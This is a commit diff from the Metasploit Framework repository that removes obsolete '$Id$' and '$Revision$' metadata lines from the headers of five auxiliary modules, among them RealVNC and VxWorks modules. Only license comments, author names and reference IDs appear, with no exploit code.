modules/auxiliary/admin/vnc/realvnc_41_bypass.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -32,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary
'theLightCosine'
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['BID', '17978'],

5
modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'hdm'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '66842'],

5
modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'hdm'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '66842'],

5
modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'hdm'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '66842'],

5
modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb
View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'hdm'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '66842'],

Some files were not shown because too many files have changed in this diff Show More